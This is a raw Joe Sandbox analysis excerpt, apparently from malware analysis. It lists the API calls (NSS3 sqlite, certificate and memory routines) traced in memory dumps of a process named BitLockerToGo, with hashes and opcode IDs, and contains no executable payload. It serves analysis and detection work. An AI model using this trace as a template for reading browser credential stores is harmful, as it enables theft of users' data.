                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0F10: malloc.MOZGLUE(00000001), ref: 6C6A0F30
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C6A0F42
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C681444,?,00000001,?,00000000,00000000,?), ref: 6C680DFF
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C681444,?,00000001,?,00000000), ref: 6C680E16
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C681444,?,00000001,?,00000000,00000000,?), ref: 6C680E53
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6C681444,?,00000001,?,00000000,00000000,?,?,6C681444,?,?,00000000), ref: 6C680E65
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C681444,?,00000001,?,00000000,00000000,?), ref: 6C680E79
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C691560: TlsGetValue.KERNEL32(00000000,?,6C660844,?), ref: 6C69157A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C691560: EnterCriticalSection.KERNEL32(?,?,?,6C660844,?), ref: 6C69158F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C691560: PR_Unlock.NSS3(?,?,?,?,6C660844,?), ref: 6C6915B2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C65B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C661397,00000000,?,6C65CF93,5B5F5EC0,00000000,?,6C661397,?), ref: 6C65B1CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C65B1A0: free.MOZGLUE(5B5F5EC0,?,6C65CF93,5B5F5EC0,00000000,?,6C661397,?), ref: 6C65B1D2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6589E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C6588AE,-00000008), ref: 6C658A04
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6589E0: EnterCriticalSection.KERNEL32(?), ref: 6C658A15
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6589E0: memset.VCRUNTIME140(6C6588AE,00000000,00000132), ref: 6C658A27
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6589E0: PR_Unlock.NSS3(?), ref: 6C658A35
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1601681851-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d7904a30215434cf40ff0d580d29baac3bfee7b5573a417acbadae964fd624ba
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 63f392d485fecf3afbd21abb644ee84c3b258e9bfc2a64b352ed74a56057b096
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7904a30215434cf40ff0d580d29baac3bfee7b5573a417acbadae964fd624ba
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1351C7F6D022005FEB009F64DC85AAF37A8AF46358F550424ED1597B12F731ED1986BA
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(?,?), ref: 6C636ED8
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(?,?), ref: 6C636EE5
                                                                                                                                                                                                                                                                                                                                                          • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C636FA8
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(00000000,?), ref: 6C636FDB
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C636FF0
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_blob.NSS3(?,?), ref: 6C637010
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_blob.NSS3(?,?), ref: 6C63701D
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C637052
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1920323672-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e7b0f62aa401ff40c13e7ec8d09264c2629589e3a106e9106bd832d9d6e4244d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 841521b142651250b52b1a85e278effa557c03d39515d5c4235531f9fd6f8839
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7b0f62aa401ff40c13e7ec8d09264c2629589e3a106e9106bd832d9d6e4244d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E661B1B1E142298BDB00CF65CE407EEB7B2BF45308F286168D419AB751E735DC15CB98
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C6A7313), ref: 6C6A8FBB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C648298,?,?,?,6C63FCE5,?), ref: 6C6A07BF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6A07E6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A081B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A0825
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C6A7313), ref: 6C6A9012
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C6A7313), ref: 6C6A903C
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C6A7313), ref: 6C6A909E
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C6A7313), ref: 6C6A90DB
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C6A7313), ref: 6C6A90F1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C6A7313), ref: 6C6A906B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C6A7313), ref: 6C6A9128
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3590961175-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2bd7b65947a6d555f7b625a72ff7a9b12d680ba8658dbd36c12ca3a764951f52
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5751A271A002018FEB109FAADC44B66B3F5AF4535CF254069D925D7B61EB32EC06CBA9
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C660715), ref: 6C658859
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658850: PR_NewLock.NSS3 ref: 6C658874
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C65888D
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C659CAD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: calloc.MOZGLUE(00000001,00000084,6C630936,00000001,?,6C63102C), ref: 6C7098E5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C659CE8
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C65ECEC,6C662FCD,00000000,?,6C662FCD,?), ref: 6C659D01
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C65ECEC,6C662FCD,00000000,?,6C662FCD,?), ref: 6C659D38
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C65ECEC,6C662FCD,00000000,?,6C662FCD,?), ref: 6C659D4D
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C659D70
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C659DC3
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C659DDD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6588D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C660725,00000000,00000058), ref: 6C658906
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6588D0: EnterCriticalSection.KERNEL32(?), ref: 6C65891A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6588D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C65894A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6588D0: calloc.MOZGLUE(00000001,6C66072D,00000000,00000000,00000000,?,6C660725,00000000,00000058), ref: 6C658959
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6588D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C658993
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6588D0: PR_Unlock.NSS3(?), ref: 6C6589AF
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3394263606-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6547e6c4b1d3d9707688cd69e3f9e626a41365378bbdbd2811da5c0783285567
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8a6329c5cc5176889668610fe97f742a7cec04d3ce2e184596e333cc6bcea2d5
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6547e6c4b1d3d9707688cd69e3f9e626a41365378bbdbd2811da5c0783285567
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 765183B0A05B058FDB00EF68C1846AEBBF0BF4534DF658669D898DBB10DB30E855CB95
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6888FC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69BE30: SECOID_FindOID_Util.NSS3(6C65311B,00000000,?,6C65311B,?), ref: 6C69BE44
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C688913
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6487ED,00000800,6C63EF74,00000000), ref: 6C6A1000
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PR_NewLock.NSS3(?,00000800,6C63EF74,00000000), ref: 6C6A1016
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6487ED,00000008,?,00000800,6C63EF74,00000000), ref: 6C6A102B
• SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6C76D864,?), ref: 6C688947
  • Part of subcall function 6C69E200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C69E245
  • Part of subcall function 6C69E200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C69E254
• SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C68895B
• DER_GetInteger_Util.NSS3(?), ref: 6C688973
• PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C688982
• SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C6889EC
• PR_SetError.NSS3(FFFFE006,00000000), ref: 6C688A12
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
• String ID:
• API String ID: 2145430656-0
• Opcode ID: fa30f51d42a3453f21c8eb695c8b5445b71c19ef4b4e3d71f4482cb6244ed1fd
• Instruction ID: 2b8f83cc5f08fbdec9de824928c0c2d448360c0404b5a348014ca09db6152e94
• Opcode Fuzzy Hash: fa30f51d42a3453f21c8eb695c8b5445b71c19ef4b4e3d71f4482cb6244ed1fd
• Instruction Fuzzy Hash: D2317DB1A0660053FF10562DAC417DA32995F9A32CF240637D919D7BA1FB21C84682AF
APIs
• PR_Now.NSS3 ref: 6C64DCFA
  • Part of subcall function 6C709DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DC6
  • Part of subcall function 6C709DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DD1
  • Part of subcall function 6C709DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C709DED
• strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C64DD40
• CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C64DD62
• CERT_DestroyCertificate.NSS3(?), ref: 6C64DD71
• CERT_DestroyCertificate.NSS3(00000000), ref: 6C64DD81
• CERT_RemoveCertListNode.NSS3(?), ref: 6C64DD8F
  • Part of subcall function 6C6606A0: TlsGetValue.KERNEL32 ref: 6C6606C2
  • Part of subcall function 6C6606A0: EnterCriticalSection.KERNEL32(?), ref: 6C6606D6
  • Part of subcall function 6C6606A0: PR_Unlock.NSS3 ref: 6C6606EB
• CERT_DestroyCertificate.NSS3(?), ref: 6C64DD9E
• CERT_DestroyCertificate.NSS3(?), ref: 6C64DDB7
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
• String ID:
• API String ID: 653623313-0
• Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
• Instruction ID: 688e00fdd10f2d52cd28267bff3d714f15ec3c90b22f976aaba86ac76c0ef826
• Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
• Instruction Fuzzy Hash: AF218CB6E011259BDB01DEA4DC409DEBBF8AF05318F14C024EC18A7701E721E914CBEA
APIs
• PR_LogFlush.NSS3(00000000,00000000,?,?,6C757AE2,?,?,?,?,?,?,6C75798A), ref: 6C75086C
  • Part of subcall function 6C750930: EnterCriticalSection.KERNEL32(?,00000000,?,6C750C83), ref: 6C75094F
  • Part of subcall function 6C750930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C750C83), ref: 6C750974
  • Part of subcall function 6C750930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C750983
  • Part of subcall function 6C750930: _PR_MD_UNLOCK.NSS3(?,?,6C750C83), ref: 6C75099F
• __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C757AE2,?,?,?,?,?,?,6C75798A), ref: 6C75087D
• __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C757AE2,?,?,?,?,?,?,6C75798A), ref: 6C750892
• fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C75798A), ref: 6C7508AA
• free.MOZGLUE(?,00000000,00000000,?,?,6C757AE2,?,?,?,?,?,?,6C75798A), ref: 6C7508C7
• free.MOZGLUE(?,00000000,00000000,?,?,6C757AE2,?,?,?,?,?,?,6C75798A), ref: 6C7508E9
• free.MOZGLUE(?,6C757AE2,?,?,?,?,?,?,6C75798A), ref: 6C7508EF
• PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C757AE2,?,?,?,?,?,?,6C75798A), ref: 6C75090E
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
• String ID:
• API String ID: 3145526462-0
• Opcode ID: 8593c10a8583a9d6f7f9be295ed8b050ef93fe4c5fea68ac319ccc1a7cc6dc1a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f3dd1b7fd9c7ff1199db07a1d89aa3e6d2a128965647f308ec29c910f689799c
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8593c10a8583a9d6f7f9be295ed8b050ef93fe4c5fea68ac319ccc1a7cc6dc1a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E1160B5B022508BFF00AF99EA49B4A3778AB4225DF5D0134E81697750DF31F8258BD2
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,6C6B460B,?,?), ref: 6C643CA9
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C643CB9
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?), ref: 6C643CC9
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(00000000), ref: 6C643CD6
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C643CE6
                                                                                                                                                                                                                                                                                                                                                          • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C643CF6
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C643D03
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C643D15
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
